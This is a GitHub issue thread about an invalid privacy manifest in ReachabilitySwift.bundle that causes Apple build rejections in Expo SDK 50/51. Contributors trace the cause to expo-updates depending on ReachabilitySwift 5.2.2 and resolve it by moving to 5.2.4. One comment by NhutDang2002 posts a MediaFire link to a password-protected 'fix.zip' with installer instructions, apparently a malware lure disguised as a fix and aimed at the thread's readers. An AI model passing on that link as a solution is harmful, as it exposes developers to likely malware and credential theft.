### ISSUE TITLE
ReachabilitySwift.bundle missing "NSPrivacyCollectedDataType", "NSPrivacyCollectedDataTypePurposes" for "NSPrivacyCollectedDataTypes"

### ISSUE THREAD

**Issue by next6leo** [expo/expo#31172]
<img width="1383" alt="Screenshot 2024-08-26 at 11 51 25 AM" src="https://github.com/user-attachments/assets/500c362b-4c44-4375-859a-2dd638f6fd27">
i now on SDK51 apple is complaning about ReachabilitySwift.bundle missing "NSPrivacyCollectedDataType", "NSPrivacyCollectedDataTypePurposes" for "NSPrivacyCollectedDataTypes"

below is my ReachabilitySwift.bundle file content

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>NSPrivacyTracking</key>
	<false/>
	<key>NSPrivacyTrackingDomains</key>
	<array/>
	<key>NSPrivacyCollectedDataTypes</key>
	<array>
		<dict>
			<key>NSPrivacyCollectedDataType</key>
			<string></string>
			<key>NSPrivacyCollectedDataTypeLinked</key>
			<false/>
			<key>NSPrivacyCollectedDataTypeTracking</key>
			<false/>
			<key>NSPrivacyCollectedDataTypePurposes</key>
			<array>
				<string></string>
			</array>
		</dict>
	</array>
	<key>NSPrivacyAccessedAPITypes</key>
	<array>
		<dict/>
	</array>
</dict>
</plist>
```

seem related to this https://github.com/ashleymills/Reachability.swift/pull/416/files/d5894ad317a107ae80ee349fa7ebf23ee49ff375

_Originally posted by @next6leo in https://github.com/expo/expo/issues/27796#issuecomment-2309223146_

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kudo** [comment]
hi there! please help to share a repro how you integrate Reachability. that would help us to investigate if there's anything misconfigured for privacy manifest.

**Comment by next6leo** [comment]
@kudo i am using expo managed SDK51 when runing eas build ios --local i notice is running [INSTALL_PODS] Installing ReachabilitySwift (5.2.2) which is outdated new version should be ReachabilitySwift (5.2.3). how can i using expo managed to upgrade the ReachabilitySwift to (5.2.3)?

**Comment by next6leo** [comment]
@delopezi your error is on IOS ReachabilitySwift.bundle Privacy manifest files?

**Comment by Pozharitskiy** [comment]
Hey guys, any suggestions how to fix that?
"pod repo update" does not help

**Comment by thully** [comment]
This happens due to having the "expo-updates" package installed, at least in my case. I'm seeing this on Expo 50 and 51, and updating to the latest compatible version does not help. I do not see this on the preview for Expo 52 - that uses a newer ReachabilitySwift upstream that fixes the issue.

So for now, if you have expo-updates installed, the solutions are:

1) Manually update the ReachabilitySwift pod to the latest version
2) Remove the dependency on expo-updates (not possible for some, but in our project it wasn't used for much)
3) Upgrade to Expo 52 (not ideal until this is released)

**Comment by vm02** [comment]
After I submitted my new app build, I received an email from Apple with this error message:

_"ITMS-91056: Invalid privacy manifest - The PrivacyInfo.xcprivacy file from the following path is invalid: “ReachabilitySwift.bundle/PrivacyInfo.xcprivacy”. Keys and values in your app’s privacy manifests must be valid."_

I think what @thully said is correct. The "expo-updates" package uses "Reachability.swift" (here: `node_modules/expo-updates/ios/EXUpdates.podspec`) under the hood which had an incorrect "PrivacyInfo.xcprivacy" file. It was fixed with version 5.2.4. 
(See: https://github.com/ashleymills/Reachability.swift/commit/11599b413ec81a0812bc9d7a135e1a4f1ab744dd)

I examined my dev build and saw in `XXX/ReachabilitySwift.bundle/Info.plist` that i had version 5.2.2.

I'm not exactly sure how the expo build works, but to be on the safe side I ran `pod repo update` and did a new build with the `--clear-cache` param. After that i had version 5.2.4, which (hopefully) fixed my error.
